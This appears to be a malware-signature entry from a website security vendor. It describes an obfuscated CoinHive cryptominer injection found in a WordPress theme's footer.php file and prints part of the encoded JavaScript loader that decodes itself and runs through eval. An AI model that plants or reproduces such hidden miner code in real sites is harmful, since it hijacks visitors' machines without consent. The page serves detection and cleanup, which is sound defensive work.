Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

Malware entry: malware.cryptominer.11

Description: One of many obfuscated CoinHive JavaScript miner injections, which usually means that it's used without webmaster's consent. This one uses the Hivelogic Enkoder for obfuscation.

<'script type="text/javascript">
//<'![CDATA[
<'!--
var x="function f(x​){var i,o=\"\",l=x.length;for(i=0;i<'l;i+=2) {if(i+1<'l)o+=" +
"x.charAt(i+1);try{o+=x.charAt(i);}catch(e){}}return o;}f(\"ufcnitnof x({)av" +
" r,i=o\\\"\\\"o,=l.​xelgnhtl,o=;lhwli​(e.xhcraoCedtAl​(1/)3=!84{)rt{y+xx=l;=+;" +
"lc}tah​ce({)}}of(r=i-l;1>i0=i;--{)+ox=c.​ahAr(t)i};erutnro s.buts​(r,0lo;)f}\\" +
"\"(1),9\\\"\\\\\\\\V\\\\​\\\\P\\\\KC3V02\\\\\\\\26\\\\04\\\\01\\\\\\\\26\\\\" +
"00\\\\00\\\\\\\\21\\\\0N\\\\\\\\\\\\\\\\\\\\21​00\\\\\\\\0/00\\\\\\\\.&05\\\\"+
..skipped...
"N9\\\\t4\\\\00\\\\\\\\O**421\\\\03\\\\02\\\\\\\\A900\\\\0%\\\\B636\\\\04\\\\"+
"-/00\\\\0\\\\\\\\\\\\\\\\Z\\\\31\\\\0>\\\\BP0L02\\\\\\\\27\\\\06\\\\01\\\\\\"+
"\\\\\\r&\\\\202203\\\\\\\\<'t>.36\\\\0;\\\\<'=21\\\\0q\\\\*'m kq,8.&e+\\\\6\\" +
"\\\\\"4\\\\4503\\\\\\\\bQ`O05\\\\0N\\\\​QIUE0F01\\\\\\\\n]lC21\\\\0Z\\\\E]IY" +
"7Z00\\\\\\\\33\\\\00\\\\03\\\\\\\\07\\\\0x\\\\HP17\\\\0N\\\​\svy3smvqy~;v{q?" +
...skipped...
"\\\\\\27\\\\03\\\\02\\\\\\\\6M02\\\\\\\\17\\\\05\\\\00\\\\\\\\+23>\\\\?(\\\""+
"}fo;n uret​}r);+)y+^(i)t(eAodrCha​.c(xdeCoarChomfrg​.intr=So+7;12%={y+)i+l;i<'0" +
";i=r(foh;gten.l=x,l\\\"\\\\\\\"\\\\o=i,r va){,y(x fontincfu)\\\"\")"         ;
while(x=eval​(x));
//-->
//]]>
<'/script>

We found this code at the bottom of the active WordPress theme's footer.php file.


Affecting: Mostly WordPress sites.

Mitigation How to clean a hacked WordPress site